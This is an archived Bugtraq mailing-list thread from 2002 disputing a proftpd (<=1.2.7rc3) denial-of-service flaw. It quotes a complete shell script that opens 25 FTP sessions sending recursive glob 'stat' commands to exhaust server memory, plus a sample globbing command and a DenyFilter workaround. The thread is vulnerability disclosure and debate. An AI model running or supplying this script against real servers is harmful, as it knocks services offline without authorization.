Bugtraq mailing list archives
Re: [VulnWatch] proftpd <=1.2.7rc3 DoS
From: Rob klein Gunnewiek <rmkleing () hio hen nl>
Date: Wed, 11 Dec 2002 01:15:01 +0100 (MET)
Hello, 1. I know that the workaround with the DenyFilter works. 2. Proftpd by default doesn't have this filter set, neither has the default proftpd install on slackware 8.1 3. The methods mentioned on the page you refer to do not work on later proftpd versions (tested on 1.2.7rc3) because of limits set in the code. i.e: ftp> ls .*./*?/.*./*?/.*./*?/.*./*?/.*./ 200 PORT command successful 150 Opening ASCII mode data connection for file list 226-Out of memory during globbing of .*./*?/.*./*?/.*./*?/.*./*?/.*./ 226 Transfer complete. ftp> these proftpd versions don't even process that command. I think I have done proper research on this issue before notifying anyone. People should do more research before making any conclusions, it's far less embarassing. Rob. On Tue, 10 Dec 2002, Kurt Seifried wrote:
This is so old I can't even find any postings/articles I remember making on it. Here is one link from early last year: http://lwn.net/2001/0322/a/proftpd-dos.php3 Check the documentation: DenyFilter \*.*/ Problem solved. People should search Google before posting, it's far less embaressing. Kurt Seifried, kurt () seifried org A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574 http://seifried.org/security/ ----- Original Message ----- From: "Rob klein Gunnewiek" <rmkleing () hio hen nl> To: <bugtraq () securityfocus com>; <vulnwatch () vulnwatch org> Sent: Sunday, December 08, 2002 4:53 AM Subject: [VulnWatch] proftpd <=1.2.7rc3 DoSHello, proftpd is vulnerable to denial of service similar to the list */../*/../*/../*. #!/bin/sh # # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least # might work against many other FTP daemons # consumes nearly all memory and alot of CPU # # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3 # # 7-dec-02 - detach - www.duho.org # # use: ./prodos.sh <host> <user> <pass> # do this some more to make sure the system eventually dies cnt=25 while [ $cnt -gt 0 ] ; do ftp -n << EOF& o $1 quote user $2 quote pass $3 quote stat /*/*/*/*/*/*/* quit EOF let cnt=cnt-1 done sleep 2 killall -9 ftp echo DONE! #end
Current thread:
- proftpd <=1.2.7rc3 DoS Rob klein Gunnewiek (Dec 11)
- Re: [VulnWatch] proftpd <=1.2.7rc3 DoS Kurt Seifried (Dec 10)
- Re: [VulnWatch] proftpd <=1.2.7rc3 DoS Rob klein Gunnewiek (Dec 11)
- Re: [VulnWatch] proftpd <=1.2.7rc3 DoS Kurt Seifried (Dec 12)
- Re: [VulnWatch] proftpd <=1.2.7rc3 DoS Rob klein Gunnewiek (Dec 11)
- Re: [VulnWatch] proftpd <=1.2.7rc3 DoS Kurt Seifried (Dec 10)